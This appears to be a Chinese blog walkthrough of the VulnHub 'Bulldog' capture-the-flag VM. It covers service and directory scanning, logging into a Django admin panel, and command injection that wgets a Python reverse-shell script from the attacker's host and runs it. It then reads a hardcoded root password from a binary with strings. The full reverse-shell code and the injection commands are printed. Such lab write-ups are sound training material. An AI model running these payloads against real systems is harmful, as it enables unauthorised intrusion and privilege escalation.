NEKO

vulnhub-Bulldog

2018/07/27

服务扫描

给了ip,直接扫服务

1
2
3
4
5
6
7
8
9
10
11
12
13
nmap -sS -A -O -Pn -T4 192.168.199.129

23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries

观察到是python写的站.

扫描目录

判断站点是否为django:https://www.leavesongs.com/PENETRATION/detect-django.html
dirsearch的字典不给力啊.
还是用dirb扫比较靠谱:

1
dirb http://192.168.199.129

发现目录:

1
2
3
4
http://192.168.199.129/admin/ 
http://192.168.199.129/dev/
http://192.168.199.129/dev/shell/ (此时shell无权限)
...(一些无卵用的目录)

登录后台

发现后台/admin(确认为django)
在/dev页面源码发现一些MD5注释,cmd5没钱,只能看别人解的(:з」∠):

1
2
用户名:sarah
密码:bulldoglover

登录后,/dev/shell可用.

getshell

kali创建neko目录,并放入python反弹shell脚本pythonshell.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
import socket,subprocess,os

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

s.connect(("192.168.199.154",1234))

os.dup2(s.fileno(),0)

os.dup2(s.fileno(),1)

os.dup2(s.fileno(),2)

p=subprocess.call(["/bin/bash","-i"])

在neko目录开启python web服务器:

1
python -m SimpleHTTPServer 80

在/dev/shell页面通过命令注入请求下载此脚本到靶机本地:

1
pwd | wget http://192.168.199.154/pythonshell.py

之后再kali监听1234端口
然后/dev/shell页面执行:

1
pwd | python pythonshell.py

kali便反弹回shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@neko:~# nc -l -p 1234
bash: cannot set terminal process group (928): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$ ls
ls
bulldog
db.sqlite3
manage.py
pythonshell.py
django@bulldog:/home/django/bulldog$

在/home/bulldogadmin/.hiddenadmindirectory目录发现:

1
2
3
4
5
6
7
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -la
ls -la
total 24
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 2017 .
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21 2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26 2017 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin 619 Sep 21 2017 note

note:

1
2
3
4
5
6
7
8
9
10
cat note 
Nick,

I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!

It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?

Let me know what you think of it!

-Ashley

提示要使用root权限.
下面这一步是真没想到,get.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
<gadmin/.hiddenadmindirectory$ strings customPermissionApp
/lib64/ld-linux-x86-64.so.2
32S0-t
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
Usage: ./customPermissionApp <username>
sudo su root
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
customPermissionApp.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

发现:

1
2
3
4
SUPERultH
imatePASH
SWORDyouH
CANTget

猜测密码为:

1
SUPERultimatePASSWORDyouCANTget

getflag:

1
2
python -c 'import pty;pty.spawn("/bin/bash")' 
sudo su

最后在/root/congrats.txt发现flag
参考:http://sec-redclub.com/archives/872/

原文作者: n3k0

发表日期: July 27th 2018, 4:33:02

发出嘶吼: 没有魔夜2玩我要死了

CATALOG
  1. 1. 服务扫描
  2. 2. 扫描目录
  3. 3. 登录后台
  4. 4. getshell